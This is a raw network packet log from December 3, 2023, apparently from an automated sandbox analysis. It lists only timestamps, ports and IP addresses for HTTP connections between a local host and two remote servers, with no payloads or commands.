Dec 3, 2023 17:22:28.011054993 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.011250019 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.230309010 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.230395079 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.231499910 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.323204041 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.449805021 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.449877977 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.450261116 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.450310946 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.541974068 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.668703079 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.668812990 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.670311928 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.670367002 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.887691975 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.887794018 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:28.889039993 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:28.889095068 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:29.106832981 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:29.107692957 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:29.198194027 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:29.417207003 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:29.417306900 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:29.636168003 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:29.636267900 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:29.855235100 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:29.855292082 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:29.855433941 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:29.855433941 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.074377060 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.074395895 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.074466944 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.293275118 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.293446064 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.293453932 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.293504953 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.512391090 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.512414932 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.512470007 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.512522936 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.731386900 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.731417894 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.731466055 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.731801033 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:30.950968027 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:30.951275110 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:31.170380116 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:31.170404911 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:31.170443058 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:31.389774084 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:31.479440928 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:31.698353052 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:31.698447943 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:31.917361021 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:31.917510986 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:32.136689901 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:32.136852980 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:32.355808020 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:32.355927944 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:32.574898005 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:32.574917078 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:32.574985981 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:32.574990988 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:32.793997049 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:32.885821104 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:33.105001926 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.105266094 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:33.324224949 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.324249029 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.324610949 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:33.543639898 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.543719053 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:33.544199944 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.544250965 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:33.762661934 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.762686968 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:33.762911081 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:33.981808901 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:34.073200941 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:34.292184114 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:34.292363882 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:34.515578032 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:34.515731096 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:34.735626936 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:34.735733986 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:34.954691887 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:34.954858065 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:35.174210072 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:35.260715008 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:35.480545998 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:35.480773926 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:35.699801922 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:35.699990034 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:35.918991089 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:36.010731936 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:36.230114937 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:36.230242968 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:36.449254990 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:36.449372053 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:36.668217897 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:36.668325901 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:36.668493986 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:36.668543100 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:36.887603998 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:36.887769938 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:37.107198000 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.107300043 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:37.326328039 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.326585054 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.326622963 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:37.326677084 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:37.545609951 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.545634985 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.545797110 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:37.765862942 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.765928984 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.766108990 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:37.985624075 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.985652924 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:37.985852957 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:38.204873085 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.204955101 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.292102098 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:38.511094093 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.511456013 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:38.730436087 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.730489016 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.730544090 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:38.730580091 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:38.730648994 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.730701923 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:38.949551105 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:38.949579000 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.042062044 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.261418104 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.261538029 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.480633020 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.480662107 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.480712891 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.480806112 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.480834007 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.480846882 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.699637890 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.699680090 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.699727058 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.699770927 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.918802023 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.918831110 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:39.918900013 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:39.918958902 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.138051033 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.138077021 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.138166904 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.138221979 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.356990099 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.357115030 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.357258081 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.357305050 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.576323986 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.576390028 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.576442957 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.576488972 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.795478106 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.795506001 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.795520067 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:40.795613050 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:40.795663118 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:41.014659882 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.014708042 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.014720917 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.014805079 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:41.233828068 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.323313951 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:41.545177937 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.545469999 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:41.765413046 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.765439034 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.765579939 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:41.984699965 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:41.985050917 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:42.204555035 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.204832077 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:42.423868895 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.424041033 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.424105883 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:42.424186945 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:42.643606901 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.643635035 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.643647909 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.643743992 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:42.862812042 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.862898111 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:42.863003016 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:42.863055944 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:43.082772970 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:43.083040953 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:43.302045107 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:43.302076101 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:43.385854006 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:43.604938984 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:43.605060101 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:43.824210882 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:43.824238062 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:43.824388981 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:43.917161942 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.043612957 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.043962002 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.136389017 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.262976885 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.263003111 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.263185024 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.482388020 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.482620955 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.701699972 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.701817036 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.701813936 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.701884985 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.921205997 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.921289921 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:44.921349049 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:44.921395063 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:45.140243053 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.140285969 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.140299082 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.140456915 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:45.140456915 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:45.359570026 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.359613895 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.359707117 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:45.578960896 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.579133034 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:45.798314095 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:45.798423052 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.017488956 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.017513990 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.017616987 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.236671925 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.236977100 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.455992937 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.456108093 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.456326962 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.456327915 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.675261974 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.675283909 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.675358057 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.675546885 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.894453049 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.894663095 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:46.894706964 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:46.894795895 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:47.113832951 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.113884926 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.113919020 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.114100933 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:47.333353043 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.417154074 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:47.636600018 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.636782885 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:47.855895042 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.855977058 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:47.856117010 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:47.948365927 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:48.075239897 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.075397015 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:48.167685032 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.167825937 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:48.294517040 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.388994932 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.389081955 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:48.609563112 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.609669924 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:48.828591108 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.828716040 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:48.828901052 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:48.828957081 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:49.047940016 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:49.047970057 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:49.048142910 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:49.048182011 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:49.167217970 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:49.171190023 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.267606020 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:49.267738104 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:49.271549940 CET	80	49731	213.248.43.99	192.168.2.4
Dec 3, 2023 17:22:49.271627903 CET	49731	80	192.168.2.4	213.248.43.99
Dec 3, 2023 17:22:49.405909061 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.406099081 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.406414032 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.407421112 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.640770912 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.641006947 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.643013000 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.643065929 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.643110037 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.644144058 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.644224882 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.877018929 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.877281904 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.877485037 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.877557039 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.877567053 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.877635956 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.877675056 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.877775908 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.878556013 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.878619909 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.878624916 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.878653049 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.878685951 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.878739119 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:49.878745079 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:49.878812075 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.112204075 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.112236977 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.112252951 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.112271070 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.112287998 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.112340927 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.112878084 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.112942934 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.113199949 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.113282919 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.113316059 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.113372087 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.348977089 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.349035978 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.349351883 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.349559069 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.349632978 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.584960938 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.584996939 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.585012913 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.585027933 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.585089922 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.585191965 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.585351944 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.585374117 CET	80	49737	80.66.89.151	192.168.2.4
Dec 3, 2023 17:22:50.585484028 CET	49737	80	192.168.2.4	80.66.89.151
Dec 3, 2023 17:22:50.585570097 CET	49737	80	192.168.2.4	80.66.89.151
